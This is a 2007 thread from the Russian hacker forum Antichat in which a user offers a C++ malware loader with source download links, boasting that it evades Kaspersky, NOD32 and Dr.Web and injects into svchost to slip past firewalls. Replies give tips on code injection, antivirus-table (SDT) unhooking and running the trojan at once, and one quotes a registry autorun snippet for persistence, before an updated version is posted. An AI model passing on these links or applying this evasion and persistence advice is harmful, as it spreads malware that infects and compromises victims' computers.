Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

27.06.2007, 16:29
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме: 1777536
Репутация:
932
|
|
Loader от меня
Решил написать лоадер. Просто выдрал из bloodknife`а всё ненужное.
Так значит:
1)Вес не пакованый 4кб.
2)Каспер, нод, др.веб в ауте.
3)Инжект в svchost - фаеры молчат.
На С++. Правите конфиг и юзаете. Естесн с исходниками.
Внимание! Адептами програминга перед просмотром сороцев положить валидол под язык!
http://lordofring.tushino.com/LOADER.rar
http://rapidshare.com/files/39634411/LOADER.rar.html
http://softz.ifolder.ru/2507458
|
|
|

27.06.2007, 17:16
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме: 5339610
Репутация:
4360
|
|
Ухх открываем сорсы и начинаем готовить мат 
|
|
|

27.06.2007, 17:28
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме: 7192869
Репутация:
3033
|
|
*Сердечный приступ*
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|

27.06.2007, 17:28
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме: 5339610
Репутация:
4360
|
|
Ну фто ж, начнём =)
Метод инжекта не очень оригинальный. Но а вдруг выбранная тобой база уже занята? Тогда ведь песец ослику (С) =( Так что было бы неплохо добавить релоки и их обработку на всякий пожарный.
Насчет добавления в автозапуск - ну эээ я например комп неделями не перезагружаю.. имхо все же лучше запускать троя сразу. Хотя это на вкус и цвет.. но тогда придется подождать завершения скачивания через WaitForSingleObject на объекте созданного в другом процессе потока
Далее, а ты уверен, что URLMON.DLL окажется в адресном пространстве жертвы? Я - нет. Поэтому было бы неплохо вначало func() дописать LoadLibrary("urlmon.dll"); а то есть риск вылететь с Access Violation
Ну а вообще кода там не очень много, про сотню строчек больше сказать, вообщем-то и нечего 
Разве что стиль отвратительный =) Ну ладно )
|
|
|

27.06.2007, 18:01
|
|
Постоянный
Регистрация: 29.04.2007
Сообщений: 496
Провел на форуме: 2715445
Репутация:
588
|
|
инжекст в свхост? и какие фаеры молчат, "огласите весь список пожалуйста" (с)
называть вещи надо своимим именами, молчать будет, по-моему, тока
виндовый фаер))) и пара таких же "псевдо" фаеров...
|
|
|

27.06.2007, 18:09
|
|
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
Провел на форуме: 1392441
Репутация:
161
|
|
у мну НОД реагирует  мож че то не так делаю... и согласен, что в хвост вставлять не стоит фаер по коннекту среагирует...
HKEY hKey;
RegCreateKeyEx(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\pol icies\\Explorer\\Run",
NULL,
"",
REG_OPTION_NON_VOLATILE,
KEY_SET_VALUE,
NULL,
&hKey,
NULL); //запуск процесса нас сильно запалит, поэтому просто запишем файлик в автозапуск.
угу а изменение реестра нод не палит да?...
|
|
|

28.06.2007, 15:00
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме: 1777536
Репутация:
932
|
|
Гы-гы svchost меняет реестр! Ужс!
Можно конечн добавить чистку sdt, но тогда вес будет не 4 , а 11кб.
|
|
|

28.06.2007, 15:22
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме: 5339610
Репутация:
4360
|
|
Можно конечн добавить чистку sdt, но тогда вес будет не 4 , а 11кб.
Смотря какой код возьмешь) Самый лучший вариант через нтсистемдебагконтрол, если достанешь, конечно)
|
|
|

28.06.2007, 15:25
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме: 1777536
Репутация:
932
|
|
Вот, критику учёл. Вес 11кб(непакованый), чистка sdt , др.веб уже в теме...
Заливать на разные файловики не стал - вес всего 7кб.
http://lordofring.tushino.com/LOADERv.1.1.rar
|
|
|

28.06.2007, 15:45
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме: 5339610
Репутация:
4360
|
|
Откуда взял такой кривой код восстановления Sdt ?)
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|